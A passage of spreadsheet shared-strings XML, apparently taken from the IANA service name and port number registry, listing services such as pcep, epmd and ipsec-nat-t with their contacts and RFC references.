    <t>Wello P2P pubsub service</t>
  </si>
  <si>
    <t>[Christian_Westbrook]</t>
  </si>
  <si>
    <t>storman</t>
  </si>
  <si>
    <t>StorMan</t>
  </si>
  <si>
    <t>[Werner_Guertler]</t>
  </si>
  <si>
    <t>MaxumSP</t>
  </si>
  <si>
    <t>Maxum Services</t>
  </si>
  <si>
    <t>[Greg_Stine]</t>
  </si>
  <si>
    <t>httpx</t>
  </si>
  <si>
    <t>HTTPX</t>
  </si>
  <si>
    <t>[Paul_McGough]</t>
  </si>
  <si>
    <t>macbak</t>
  </si>
  <si>
    <t>MacBak</t>
  </si>
  <si>
    <t>[Wes_Peters]</t>
  </si>
  <si>
    <t>pcptcpservice</t>
  </si>
  <si>
    <t>Production Company Pro TCP Service</t>
  </si>
  <si>
    <t>[Ben_McNeill]</t>
  </si>
  <si>
    <t>cyborgnet</t>
  </si>
  <si>
    <t>CyborgNet communications protocol</t>
  </si>
  <si>
    <t>[Gareth_Nelson]</t>
  </si>
  <si>
    <t>universe-suite</t>
  </si>
  <si>
    <t>UNIVERSE SUITE MESSAGE SERVICE
IANA assigned this well-formed service name as a replacement for "universe_suite".</t>
  </si>
  <si>
    <t>[Gary_ANDREWS]</t>
  </si>
  <si>
    <t>universe_suite</t>
  </si>
  <si>
    <t>UNIVERSE SUITE MESSAGE SERVICE</t>
  </si>
  <si>
    <t>This entry is an alias to "universe-suite".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>wcpp</t>
  </si>
  <si>
    <t>Woven Control Plane Protocol</t>
  </si>
  <si>
    <t>[Christopher_LILJENST]</t>
  </si>
  <si>
    <t>boxbackupstore</t>
  </si>
  <si>
    <t>Box Backup Store Service</t>
  </si>
  <si>
    <t>[Chris_Wilson]</t>
  </si>
  <si>
    <t>csc-proxy</t>
  </si>
  <si>
    <t>Cascade Proxy
IANA assigned this well-formed service name as a replacement for "csc_proxy".</t>
  </si>
  <si>
    <t>[Matt_Craighead]</t>
  </si>
  <si>
    <t>csc_proxy</t>
  </si>
  <si>
    <t>Cascade Proxy</t>
  </si>
  <si>
    <t>This entry is an alias to "csc-proxy".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>vatata</t>
  </si>
  <si>
    <t>Vatata Peer to Peer Protocol</t>
  </si>
  <si>
    <t>[Song_Jian]</t>
  </si>
  <si>
    <t>pcep</t>
  </si>
  <si>
    <t>Path Computation Element Communication Protocol</t>
  </si>
  <si>
    <t>[RFC5440]</t>
  </si>
  <si>
    <t>sieve</t>
  </si>
  <si>
    <t>ManageSieve Protocol</t>
  </si>
  <si>
    <t>[RFC5804]</t>
  </si>
  <si>
    <t>dsmipv6</t>
  </si>
  <si>
    <t>Dual Stack MIPv6 NAT Traversal</t>
  </si>
  <si>
    <t>[RFC5555]</t>
  </si>
  <si>
    <t>azeti</t>
  </si>
  <si>
    <t>Azeti Agent Service</t>
  </si>
  <si>
    <t>[Uwe_Holz]</t>
  </si>
  <si>
    <t>azeti-bd</t>
  </si>
  <si>
    <t>azeti blinddate</t>
  </si>
  <si>
    <t>[Michael_Werski]</t>
  </si>
  <si>
    <t>pvxplusio</t>
  </si>
  <si>
    <t>PxPlus remote file srvr</t>
  </si>
  <si>
    <t>[Mike_King]</t>
  </si>
  <si>
    <t>aws-wsp</t>
  </si>
  <si>
    <t>AWS protocol for cloud remoting solution</t>
  </si>
  <si>
    <t>[Amazon.com_Services_LLC]</t>
  </si>
  <si>
    <t>[Lauren_Townsend]</t>
  </si>
  <si>
    <t>hctl</t>
  </si>
  <si>
    <t>Harman HControl Protocol</t>
  </si>
  <si>
    <t>[Harman_International_Industries_Inc]</t>
  </si>
  <si>
    <t>[Darin_Smith]</t>
  </si>
  <si>
    <t>eims-admin</t>
  </si>
  <si>
    <t>EIMS ADMIN</t>
  </si>
  <si>
    <t>[Glenn_Anderson]</t>
  </si>
  <si>
    <t>vrml-multi-use</t>
  </si>
  <si>
    <t>4200-4299</t>
  </si>
  <si>
    <t>VRML Multi User Systems</t>
  </si>
  <si>
    <t>[Mitra]</t>
  </si>
  <si>
    <t>corelccam</t>
  </si>
  <si>
    <t>Corel CCam</t>
  </si>
  <si>
    <t>[Jason_Aiken]</t>
  </si>
  <si>
    <t>d-data</t>
  </si>
  <si>
    <t>Diagnostic Data</t>
  </si>
  <si>
    <t>d-data-control</t>
  </si>
  <si>
    <t>Diagnostic Data Control</t>
  </si>
  <si>
    <t>[Jon_March]</t>
  </si>
  <si>
    <t>srcp</t>
  </si>
  <si>
    <t>Simple Railroad Command Protocol</t>
  </si>
  <si>
    <t>[Matthias_Trute]</t>
  </si>
  <si>
    <t>owserver</t>
  </si>
  <si>
    <t>One-Wire Filesystem Server</t>
  </si>
  <si>
    <t>[Paul_Alfille]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers</t>
  </si>
  <si>
    <t>batman</t>
  </si>
  <si>
    <t>better approach to mobile ad-hoc networking</t>
  </si>
  <si>
    <t>[Simon_Wunderlich]</t>
  </si>
  <si>
    <t>pinghgl</t>
  </si>
  <si>
    <t>Hellgate London</t>
  </si>
  <si>
    <t>[David_Berk]</t>
  </si>
  <si>
    <t>trueconf</t>
  </si>
  <si>
    <t>TrueConf Videoconference Service</t>
  </si>
  <si>
    <t>[Dmitry_Odintsov]</t>
  </si>
  <si>
    <t>[Lev_Yakupov]</t>
  </si>
  <si>
    <t>compx-lockview</t>
  </si>
  <si>
    <t>CompX-LockView</t>
  </si>
  <si>
    <t>[John_Payson]</t>
  </si>
  <si>
    <t>dserver</t>
  </si>
  <si>
    <t>Exsequi Appliance Discovery</t>
  </si>
  <si>
    <t>[Angelo_Masci]</t>
  </si>
  <si>
    <t>mirrtex</t>
  </si>
  <si>
    <t>Mir-RT exchange service</t>
  </si>
  <si>
    <t>[Sylvain_Robert]</t>
  </si>
  <si>
    <t>p6ssmc</t>
  </si>
  <si>
    <t>P6R Secure Server Management Console</t>
  </si>
  <si>
    <t>[Jim_Susoy]</t>
  </si>
  <si>
    <t>pscl-mgt</t>
  </si>
  <si>
    <t>Parascale Membership Manager</t>
  </si>
  <si>
    <t>[John_Muth]</t>
  </si>
  <si>
    <t>perrla</t>
  </si>
  <si>
    <t>PERRLA User Services</t>
  </si>
  <si>
    <t>[Cliff_Batson]</t>
  </si>
  <si>
    <t>choiceview-agt</t>
  </si>
  <si>
    <t>ChoiceView Agent</t>
  </si>
  <si>
    <t>[Radish_Systems]</t>
  </si>
  <si>
    <t>[Richard_A_Davis]</t>
  </si>
  <si>
    <t>Unauthorized Use Known on port 4315</t>
  </si>
  <si>
    <t>choiceview-clt</t>
  </si>
  <si>
    <t>ChoiceView Client</t>
  </si>
  <si>
    <t>4317-4319</t>
  </si>
  <si>
    <t>fdt-rcatp</t>
  </si>
  <si>
    <t>FDT Remote Categorization Protocol</t>
  </si>
  <si>
    <t>[Russell_P_Holsclaw]</t>
  </si>
  <si>
    <t>rwhois</t>
  </si>
  <si>
    <t>Remote Who Is</t>
  </si>
  <si>
    <t>[Mark_Kosters]</t>
  </si>
  <si>
    <t>[RFC2167]</t>
  </si>
  <si>
    <t>trim-event</t>
  </si>
  <si>
    <t>TRIM Event Service</t>
  </si>
  <si>
    <t>trim-ice</t>
  </si>
  <si>
    <t>TRIM ICE Service</t>
  </si>
  <si>
    <t>[Siva_Poobalasingam_2]</t>
  </si>
  <si>
    <t>This entry is being removed on 2015-05-12.</t>
  </si>
  <si>
    <t>geognosisman</t>
  </si>
  <si>
    <t>Cadcorp GeognoSIS Manager Service</t>
  </si>
  <si>
    <t>geognosis</t>
  </si>
  <si>
    <t>Cadcorp GeognoSIS Service</t>
  </si>
  <si>
    <t>[Martin_Daly]</t>
  </si>
  <si>
    <t>jaxer-web</t>
  </si>
  <si>
    <t>Jaxer Web Protocol</t>
  </si>
  <si>
    <t>[Uri_Sarid]</t>
  </si>
  <si>
    <t>jaxer-manager</t>
  </si>
  <si>
    <t>Jaxer Manager Command Protocol</t>
  </si>
  <si>
    <t>publiqare-sync</t>
  </si>
  <si>
    <t>PubliQare Distributed Environment Synchronisation Engine</t>
  </si>
  <si>
    <t>[Tom_Maaswinkel]</t>
  </si>
  <si>
    <t>dey-sapi</t>
  </si>
  <si>
    <t>DEY Storage Administration REST API</t>
  </si>
  <si>
    <t>[DEY_Storage_Systems_Inc]</t>
  </si>
  <si>
    <t>[Garrett_D_Amore]</t>
  </si>
  <si>
    <t>ktickets-rest</t>
  </si>
  <si>
    <t>ktickets REST API for event management and ticketing systems (embedded POS devices)</t>
  </si>
  <si>
    <t>[KeyTicket_Solutions]</t>
  </si>
  <si>
    <t>[MANG_Ioan-Alexandru]</t>
  </si>
  <si>
    <t>getty-focus</t>
  </si>
  <si>
    <t>Getty Images FOCUS service</t>
  </si>
  <si>
    <t>[Matthew_Margolis]</t>
  </si>
  <si>
    <t>[Bryan_Ramirez]</t>
  </si>
  <si>
    <t>ahsp</t>
  </si>
  <si>
    <t>ArrowHead Service Protocol (AHSP)</t>
  </si>
  <si>
    <t>[QuantuMatriX_Technologies]</t>
  </si>
  <si>
    <t>[Matthew_Schultz]</t>
  </si>
  <si>
    <t>netconf-ch-ssh</t>
  </si>
  <si>
    <t>NETCONF Call Home (SSH)</t>
  </si>
  <si>
    <t>[RFC8071]</t>
  </si>
  <si>
    <t>netconf-ch-tls</t>
  </si>
  <si>
    <t>NETCONF Call Home (TLS)</t>
  </si>
  <si>
    <t>restconf-ch-tls</t>
  </si>
  <si>
    <t>RESTCONF Call Home (TLS)</t>
  </si>
  <si>
    <t>4337-4339</t>
  </si>
  <si>
    <t>gaia</t>
  </si>
  <si>
    <t>Gaia Connector Protocol</t>
  </si>
  <si>
    <t>[Philippe_Detournay]</t>
  </si>
  <si>
    <t>lisp-data</t>
  </si>
  <si>
    <t>LISP Data Packets</t>
  </si>
  <si>
    <t>[RFC6830]</t>
  </si>
  <si>
    <t>lisp-control</t>
  </si>
  <si>
    <t>LISP Control Packets</t>
  </si>
  <si>
    <t>unicall</t>
  </si>
  <si>
    <t>UNICALL</t>
  </si>
  <si>
    <t>[James_Powell_2]</t>
  </si>
  <si>
    <t>vinainstall</t>
  </si>
  <si>
    <t>VinaInstall</t>
  </si>
  <si>
    <t>[Jay_Slupesky]</t>
  </si>
  <si>
    <t>m4-network-as</t>
  </si>
  <si>
    <t>Macro 4 Network AS</t>
  </si>
  <si>
    <t>[Paul_Wren]</t>
  </si>
  <si>
    <t>elanlm</t>
  </si>
  <si>
    <t>ELAN LM</t>
  </si>
  <si>
    <t>[Paul_Ballew]</t>
  </si>
  <si>
    <t>lansurveyor</t>
  </si>
  <si>
    <t>LAN Surveyor</t>
  </si>
  <si>
    <t>itose</t>
  </si>
  <si>
    <t>ITOSE</t>
  </si>
  <si>
    <t>fsportmap</t>
  </si>
  <si>
    <t>File System Port Map</t>
  </si>
  <si>
    <t>[Ron_Minnich_2]</t>
  </si>
  <si>
    <t>net-device</t>
  </si>
  <si>
    <t>Net Device</t>
  </si>
  <si>
    <t>[Glenn_Peterson]</t>
  </si>
  <si>
    <t>plcy-net-svcs</t>
  </si>
  <si>
    <t>PLCY Net Services</t>
  </si>
  <si>
    <t>[J_J_Ekstrom]</t>
  </si>
  <si>
    <t>pjlink</t>
  </si>
  <si>
    <t>Projector Link</t>
  </si>
  <si>
    <t>[Mitsuo_Kodama]</t>
  </si>
  <si>
    <t>2005-06</t>
  </si>
  <si>
    <t>f5-iquery</t>
  </si>
  <si>
    <t>F5 iQuery</t>
  </si>
  <si>
    <t>[Tom_Kee]</t>
  </si>
  <si>
    <t>qsnet-trans</t>
  </si>
  <si>
    <t>QSNet Transmitter</t>
  </si>
  <si>
    <t>qsnet-workst</t>
  </si>
  <si>
    <t>QSNet Workstation</t>
  </si>
  <si>
    <t>qsnet-assist</t>
  </si>
  <si>
    <t>QSNet Assistant</t>
  </si>
  <si>
    <t>qsnet-cond</t>
  </si>
  <si>
    <t>QSNet Conductor</t>
  </si>
  <si>
    <t>qsnet-nucl</t>
  </si>
  <si>
    <t>QSNet Nucleus</t>
  </si>
  <si>
    <t>[Neer_Kleinman]</t>
  </si>
  <si>
    <t>omabcastltkm</t>
  </si>
  <si>
    <t>OMA BCAST Long-Term Key Messages</t>
  </si>
  <si>
    <t>[Frank_Hartung]</t>
  </si>
  <si>
    <t>matrix-vnet</t>
  </si>
  <si>
    <t>Matrix VNet Communication Protocol
IANA assigned this well-formed service name as a replacement for "matrix_vnet".</t>
  </si>
  <si>
    <t>[Rehan_Mahmood]</t>
  </si>
  <si>
    <t>matrix_vnet</t>
  </si>
  <si>
    <t>Matrix VNet Communication Protocol</t>
  </si>
  <si>
    <t>This entry is an alias to "matrix-vnet".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>nacnl</t>
  </si>
  <si>
    <t>NavCom Discovery and Control Port</t>
  </si>
  <si>
    <t>[Yilei_Jia]</t>
  </si>
  <si>
    <t>afore-vdp-disc</t>
  </si>
  <si>
    <t>AFORE vNode Discovery protocol</t>
  </si>
  <si>
    <t>[Michael_Richardson]</t>
  </si>
  <si>
    <t>4363-4365</t>
  </si>
  <si>
    <t>shadowstream</t>
  </si>
  <si>
    <t>ShadowStream System</t>
  </si>
  <si>
    <t>[StorageCraft_Technology_Corporation]</t>
  </si>
  <si>
    <t>[David_McConkie]</t>
  </si>
  <si>
    <t>wxbrief</t>
  </si>
  <si>
    <t>WeatherBrief Direct</t>
  </si>
  <si>
    <t>[Kim_Alan_Waggoner]</t>
  </si>
  <si>
    <t>epmd</t>
  </si>
  <si>
    <t>Erlang Port Mapper Daemon</t>
  </si>
  <si>
    <t>[Erlang]</t>
  </si>
  <si>
    <t>elpro-tunnel</t>
  </si>
  <si>
    <t>ELPRO V2 Protocol Tunnel
IANA assigned this well-formed service name as a replacement for "elpro_tunnel".</t>
  </si>
  <si>
    <t>[Harry_Courtice]</t>
  </si>
  <si>
    <t>elpro_tunnel</t>
  </si>
  <si>
    <t>ELPRO V2 Protocol Tunnel</t>
  </si>
  <si>
    <t>This entry is an alias to "elpro-tunnel".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>l2c-control</t>
  </si>
  <si>
    <t>LAN2CAN Control</t>
  </si>
  <si>
    <t>[Phil_Tolson]</t>
  </si>
  <si>
    <t>Modified: 21 January 2010</t>
  </si>
  <si>
    <t>l2c-disc</t>
  </si>
  <si>
    <t>LAN2CAN Discovery</t>
  </si>
  <si>
    <t>l2c-data</t>
  </si>
  <si>
    <t>LAN2CAN Data</t>
  </si>
  <si>
    <t>remctl</t>
  </si>
  <si>
    <t>Remote Authenticated Command Service</t>
  </si>
  <si>
    <t>[Russ_Allbery]</t>
  </si>
  <si>
    <t>psi-ptt</t>
  </si>
  <si>
    <t>PSI Push-to-Talk Protocol</t>
  </si>
  <si>
    <t>[Frank_B]</t>
  </si>
  <si>
    <t>tolteces</t>
  </si>
  <si>
    <t>Toltec EasyShare</t>
  </si>
  <si>
    <t>[Joon_Radley_2]</t>
  </si>
  <si>
    <t>bip</t>
  </si>
  <si>
    <t>BioAPI Interworking</t>
  </si>
  <si>
    <t>[Jean_Paul_Lemaire]</t>
  </si>
  <si>
    <t>cp-spxsvr</t>
  </si>
  <si>
    <t>Cambridge Pixel SPx Server</t>
  </si>
  <si>
    <t>cp-spxdpy</t>
  </si>
  <si>
    <t>Cambridge Pixel SPx Display</t>
  </si>
  <si>
    <t>[Richard_Warren]</t>
  </si>
  <si>
    <t>ctdb</t>
  </si>
  <si>
    <t>CTDB</t>
  </si>
  <si>
    <t>[Ronnie_Sahlberg]</t>
  </si>
  <si>
    <t>4380-4388</t>
  </si>
  <si>
    <t>xandros-cms</t>
  </si>
  <si>
    <t>Xandros Community Management Service</t>
  </si>
  <si>
    <t>[Stephen_M_Webb]</t>
  </si>
  <si>
    <t>wiegand</t>
  </si>
  <si>
    <t>Physical Access Control</t>
  </si>
  <si>
    <t>[Scott_Guthery_2]</t>
  </si>
  <si>
    <t>apwi-imserver</t>
  </si>
  <si>
    <t>American Printware IMServer Protocol</t>
  </si>
  <si>
    <t>[Lech_Lakomy]</t>
  </si>
  <si>
    <t>apwi-rxserver</t>
  </si>
  <si>
    <t>American Printware RXServer Protocol</t>
  </si>
  <si>
    <t>apwi-rxspooler</t>
  </si>
  <si>
    <t>American Printware RXSpooler Protocol</t>
  </si>
  <si>
    <t>apwi-disc</t>
  </si>
  <si>
    <t>American Printware Discovery</t>
  </si>
  <si>
    <t>omnivisionesx</t>
  </si>
  <si>
    <t>OmniVision communication for Virtual environments</t>
  </si>
  <si>
    <t>[Vacquier_Serge]</t>
  </si>
  <si>
    <t>fly</t>
  </si>
  <si>
    <t>Fly Object Space</t>
  </si>
  <si>
    <t>[Nigel_Warren]</t>
  </si>
  <si>
    <t>4397-4399</t>
  </si>
  <si>
    <t>ds-srv</t>
  </si>
  <si>
    <t>ASIGRA Services</t>
  </si>
  <si>
    <t>[David_Farajun]</t>
  </si>
  <si>
    <t>ds-srvr</t>
  </si>
  <si>
    <t>ASIGRA Televaulting DS-System Service</t>
  </si>
  <si>
    <t>ds-clnt</t>
  </si>
  <si>
    <t>ASIGRA Televaulting DS-Client Service</t>
  </si>
  <si>
    <t>ds-user</t>
  </si>
  <si>
    <t>ASIGRA Televaulting DS-Client Monitoring/Management</t>
  </si>
  <si>
    <t>ds-admin</t>
  </si>
  <si>
    <t>ASIGRA Televaulting DS-System Monitoring/Management</t>
  </si>
  <si>
    <t>ds-mail</t>
  </si>
  <si>
    <t>ASIGRA Televaulting Message Level Restore service</t>
  </si>
  <si>
    <t>ds-slp</t>
  </si>
  <si>
    <t>ASIGRA Televaulting DS-Sleeper Service</t>
  </si>
  <si>
    <t>[Andrei_Litvinn]</t>
  </si>
  <si>
    <t>nacagent</t>
  </si>
  <si>
    <t>Network Access Control Agent</t>
  </si>
  <si>
    <t>[ITGroup]</t>
  </si>
  <si>
    <t>slscc</t>
  </si>
  <si>
    <t>SLS Technology Control Centre</t>
  </si>
  <si>
    <t>[Steven_Sweeting]</t>
  </si>
  <si>
    <t>netcabinet-com</t>
  </si>
  <si>
    <t>Net-Cabinet comunication</t>
  </si>
  <si>
    <t>[Ian_Manning_2]</t>
  </si>
  <si>
    <t>itwo-server</t>
  </si>
  <si>
    <t>RIB iTWO Application Server</t>
  </si>
  <si>
    <t>[Kristean_Heisler_2]</t>
  </si>
  <si>
    <t>found</t>
  </si>
  <si>
    <t>Found Messaging Protocol</t>
  </si>
  <si>
    <t>[Found_Software]</t>
  </si>
  <si>
    <t>[John_Mitchell]</t>
  </si>
  <si>
    <t>Defined TXT keys: id, key</t>
  </si>
  <si>
    <t>smallchat</t>
  </si>
  <si>
    <t>SmallChat</t>
  </si>
  <si>
    <t>[Valentino_Giudice]</t>
  </si>
  <si>
    <t>avi-nms</t>
  </si>
  <si>
    <t>AVI Systems NMS</t>
  </si>
  <si>
    <t>[AVI_Systems]</t>
  </si>
  <si>
    <t>[Dave_Hatz]</t>
  </si>
  <si>
    <t>avi-nms-disc</t>
  </si>
  <si>
    <t>updog</t>
  </si>
  <si>
    <t>Updog Monitoring and Status Framework</t>
  </si>
  <si>
    <t>[Egon_Technologies_LLC]</t>
  </si>
  <si>
    <t>[James_Downs]</t>
  </si>
  <si>
    <t>brcd-vr-req</t>
  </si>
  <si>
    <t>Brocade Virtual Router Request</t>
  </si>
  <si>
    <t>[Brocade_Communications_Systems]</t>
  </si>
  <si>
    <t>[Nick_Carter]</t>
  </si>
  <si>
    <t>pjj-player</t>
  </si>
  <si>
    <t>PJJ Media Player</t>
  </si>
  <si>
    <t>[PJJ_Productions_Inc]</t>
  </si>
  <si>
    <t>[Bruno_Frechette]</t>
  </si>
  <si>
    <t>pjj-player-disc</t>
  </si>
  <si>
    <t>PJJ Media Player discovery</t>
  </si>
  <si>
    <t>workflowdir</t>
  </si>
  <si>
    <t>Workflow Director Communication</t>
  </si>
  <si>
    <t>[WfDir]</t>
  </si>
  <si>
    <t>[Brian_Doyle]</t>
  </si>
  <si>
    <t>axysbridge</t>
  </si>
  <si>
    <t>AXYS communication protocol</t>
  </si>
  <si>
    <t>[Duran_Audio_B.V.]</t>
  </si>
  <si>
    <t>[Gerald_van_Beuningen]</t>
  </si>
  <si>
    <t>cbp</t>
  </si>
  <si>
    <t>Colnod Binary Protocol</t>
  </si>
  <si>
    <t>[Colsys_s.r.o.]</t>
  </si>
  <si>
    <t>[Jiri_Merth]</t>
  </si>
  <si>
    <t>nvme</t>
  </si>
  <si>
    <t>NVM Express over Fabrics storage access</t>
  </si>
  <si>
    <t>[NVM_Express_Inc]</t>
  </si>
  <si>
    <t>[Amber_Huffman]</t>
  </si>
  <si>
    <t>scaleft</t>
  </si>
  <si>
    <t>Multi-Platform Remote Management for Cloud Infrastructure</t>
  </si>
  <si>
    <t>[ScaleFT_Inc]</t>
  </si>
  <si>
    <t>[Paul_Querna]</t>
  </si>
  <si>
    <t>tsepisp</t>
  </si>
  <si>
    <t>TSEP Installation Service Protocol</t>
  </si>
  <si>
    <t>[Technical_Software_Engineering_Plazotta]</t>
  </si>
  <si>
    <t>[Peter_Plazotta]</t>
  </si>
  <si>
    <t>thingkit</t>
  </si>
  <si>
    <t>thingkit secure mesh</t>
  </si>
  <si>
    <t>[thingkit_inc.]</t>
  </si>
  <si>
    <t>[Chris_Bell]</t>
  </si>
  <si>
    <t>netrockey6</t>
  </si>
  <si>
    <t>NetROCKEY6 SMART Plus Service</t>
  </si>
  <si>
    <t>[Feitian_Technologies]</t>
  </si>
  <si>
    <t>beacon-port-2</t>
  </si>
  <si>
    <t>SMARTS Beacon Port</t>
  </si>
  <si>
    <t>[Eyal_Yardeni]</t>
  </si>
  <si>
    <t>drizzle</t>
  </si>
  <si>
    <t>Drizzle database server</t>
  </si>
  <si>
    <t>[Elliot_Murphy]</t>
  </si>
  <si>
    <t>omviserver</t>
  </si>
  <si>
    <t>OMV-Investigation Server-Client</t>
  </si>
  <si>
    <t>omviagent</t>
  </si>
  <si>
    <t>OMV Investigation Agent-Server</t>
  </si>
  <si>
    <t>rsqlserver</t>
  </si>
  <si>
    <t>REAL SQL Server</t>
  </si>
  <si>
    <t>[Marco_Bambini]</t>
  </si>
  <si>
    <t>wspipe</t>
  </si>
  <si>
    <t>adWISE Pipe</t>
  </si>
  <si>
    <t>[Heikki_E]</t>
  </si>
  <si>
    <t>l-acoustics</t>
  </si>
  <si>
    <t>L-ACOUSTICS management</t>
  </si>
  <si>
    <t>[L-ACOUSTICS]</t>
  </si>
  <si>
    <t>[Christophe_Pignon]</t>
  </si>
  <si>
    <t>vop</t>
  </si>
  <si>
    <t>Versile Object Protocol</t>
  </si>
  <si>
    <t>[Versile_AS]</t>
  </si>
  <si>
    <t>[Tore_Skaug]</t>
  </si>
  <si>
    <t>4434-4440</t>
  </si>
  <si>
    <t>netblox</t>
  </si>
  <si>
    <t>Netblox Protocol</t>
  </si>
  <si>
    <t>[Brian_S_Locke]</t>
  </si>
  <si>
    <t>saris</t>
  </si>
  <si>
    <t>Saris</t>
  </si>
  <si>
    <t>pharos</t>
  </si>
  <si>
    <t>Pharos</t>
  </si>
  <si>
    <t>[TeleConsult]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 4443</t>
  </si>
  <si>
    <t>krb524</t>
  </si>
  <si>
    <t>KRB524</t>
  </si>
  <si>
    <t>krb524 assigned the port, nv used it without an assignment</t>
  </si>
  <si>
    <t>nv-video</t>
  </si>
  <si>
    <t>NV Video default</t>
  </si>
  <si>
    <t>[Ron_Frederick]</t>
  </si>
  <si>
    <t>upnotifyp</t>
  </si>
  <si>
    <t>UPNOTIFYP</t>
  </si>
  <si>
    <t>n1-fwp</t>
  </si>
  <si>
    <t>N1-FWP</t>
  </si>
  <si>
    <t>n1-rmgmt</t>
  </si>
  <si>
    <t>N1-RMGMT</t>
  </si>
  <si>
    <t>[Lori_Tassin]</t>
  </si>
  <si>
    <t>asc-slmd</t>
  </si>
  <si>
    <t>ASC Licence Manager</t>
  </si>
  <si>
    <t>[Casper_Stoel]</t>
  </si>
  <si>
    <t>privatewire</t>
  </si>
  <si>
    <t>PrivateWire</t>
  </si>
  <si>
    <t>[Uri_Resnitzky]</t>
  </si>
  <si>
    <t>camp</t>
  </si>
  <si>
    <t>Common ASCII Messaging Protocol</t>
  </si>
  <si>
    <t>[Control_Technology_Inc]</t>
  </si>
  <si>
    <t>[Clint_Eskew]</t>
  </si>
  <si>
    <t>ctisystemmsg</t>
  </si>
  <si>
    <t>CTI System Msg</t>
  </si>
  <si>
    <t>ctiprogramload</t>
  </si>
  <si>
    <t>CTI Program Load</t>
  </si>
  <si>
    <t>nssalertmgr</t>
  </si>
  <si>
    <t>NSS Alert Manager</t>
  </si>
  <si>
    <t>nssagentmgr</t>
  </si>
  <si>
    <t>NSS Agent Manager</t>
  </si>
  <si>
    <t>[Jim_Hill]</t>
  </si>
  <si>
    <t>prchat-user</t>
  </si>
  <si>
    <t>PR Chat User</t>
  </si>
  <si>
    <t>prchat-server</t>
  </si>
  <si>
    <t>PR Chat Server</t>
  </si>
  <si>
    <t>prRegister</t>
  </si>
  <si>
    <t>PR Register</t>
  </si>
  <si>
    <t>[Donny_Gilor]</t>
  </si>
  <si>
    <t>mcp</t>
  </si>
  <si>
    <t>Matrix Configuration Protocol</t>
  </si>
  <si>
    <t>[Tim_DeBaillie]</t>
  </si>
  <si>
    <t>ntske</t>
  </si>
  <si>
    <t>Network Time Security Key Establishment</t>
  </si>
  <si>
    <t>[RFC-ietf-ntp-using-nts-for-ntp-28]</t>
  </si>
  <si>
    <t>4461-4483</t>
  </si>
  <si>
    <t>hpssmgmt</t>
  </si>
  <si>
    <t>hpssmgmt service</t>
  </si>
  <si>
    <t>[David_Straw]</t>
  </si>
  <si>
    <t>assyst-dr</t>
  </si>
  <si>
    <t>Assyst Data Repository Service</t>
  </si>
  <si>
    <t>[Albert_Cester]</t>
  </si>
  <si>
    <t>icms</t>
  </si>
  <si>
    <t>Integrated Client Message Service</t>
  </si>
  <si>
    <t>[Resource_Allocation]</t>
  </si>
  <si>
    <t>prex-tcp</t>
  </si>
  <si>
    <t>Protocol for Remote Execution over TCP</t>
  </si>
  <si>
    <t>[Daniel_Ruppert]</t>
  </si>
  <si>
    <t>awacs-ice</t>
  </si>
  <si>
    <t>Apple Wide Area Connectivity Service ICE Bootstrap</t>
  </si>
  <si>
    <t>[Rory_McGuire]</t>
  </si>
  <si>
    <t>4489-4499</t>
  </si>
  <si>
    <t>Known UNAUTHORIZED USE: Ports 4490 and 4491</t>
  </si>
  <si>
    <t>ipsec-nat-t</t>
  </si>
  <si>
    <t>IPsec NAT-Traversal</t>
  </si>
  <si>
    <t>[RFC8229]</t>
  </si>
  <si>
    <t>[RFC3948][RFC7296]</t>
  </si>
  <si>
    <t>De-registered 08 June 2001</t>
  </si>
  <si>
    <t>a25-fap-fgw</t>
  </si>
  <si>
    <t>A25 (FAP-FGW)</t>
  </si>
  <si>
    <t>[ThreeGPP_2]</t>
  </si>
  <si>
    <t>[Zhiming_Li]</t>
  </si>
  <si>
    <t>4503-4533</t>
  </si>
  <si>
    <t>armagetronad</t>
  </si>
  <si>
    <t>Armagetron Advanced Game Server</t>
  </si>
  <si>
    <t>[Manuel_Moos]</t>
  </si>
  <si>
    <t>[Yann_Kaiser]</t>
  </si>
  <si>
    <t>ehs</t>
  </si>
  <si>
    <t>Event Heap Server</t>
  </si>
  <si>
    <t>ehs-ssl</t>
  </si>
  <si>
    <t>Event Heap Server SSL</t>
  </si>
  <si>
    <t>[Brad_Johanson]</t>
  </si>
  <si>
    <t>wssauthsvc</t>
  </si>
  <si>
    <t>WSS Security Service</t>
  </si>
  <si>
    <t>[Mark_Tirschwell]</t>
  </si>
  <si>
    <t>swx-gate</t>
  </si>
  <si>
    <t>Software Data Exchange Gateway</t>
  </si>
  <si>
    <t>[Julien_VALIENTE]</t>
  </si>
  <si>
    <t>4539-4544</t>
  </si>
  <si>
    <t>worldscores</t>
  </si>
  <si>
    <t>WorldScores</t>
  </si>
  <si>
    <t>[Steve_Davis]</t>
  </si>
  <si>
    <t>sf-lm</t>
  </si>
  <si>
    <t>SF License Manager (Sentinel)</t>
  </si>
  <si>
    <t>[Thomas_Koell]</t>
  </si>
  <si>
    <t>lanner-lm</t>
  </si>
  <si>
    <t>Lanner License Manager</t>
  </si>
  <si>
    <t>[Les_Enstone]</t>
  </si>
  <si>
    <t>synchromesh</t>
  </si>
  <si>
    <t>Synchromesh</t>
  </si>
  <si>
    <t>[Tom_Hawkins_2]</t>
  </si>
  <si>
    <t>aegate</t>
  </si>
  <si>
    <t>Aegate PMR Service</t>
  </si>
  <si>
    <t>[Nick_Warrington]</t>
  </si>
  <si>
    <t>gds-adppiw-db</t>
  </si>
  <si>
    <t>Perman I Interbase Server</t>
  </si>
  <si>
    <t>[Leo_Lesage]</t>
  </si>
  <si>
    <t>ieee-mih</t>
  </si>
  <si>
    <t>MIH Services</t>
  </si>
  <si>
    <t>[RFC5677]</t>
  </si>
  <si>
    <t>menandmice-mon</t>
  </si>
  <si>
    <t>Men and Mice Monitoring</t>
  </si>
  <si>
    <t>[Carsten_Strotmann]</t>
  </si>
  <si>
    <t>icshostsvc</t>
  </si>
  <si>
    <t>ICS host services</t>
  </si>
  <si>
    <t>[Gordan_Vosicki]</t>
  </si>
  <si>
    <t>msfrs</t>
  </si>
  <si>
    <t>MS FRS Replication</t>
  </si>
  <si>
    <t>[Kev_George]</t>
  </si>
  <si>
    <t>rsip</t>
  </si>
  <si>
    <t>RSIP Port</t>
  </si>
  <si>
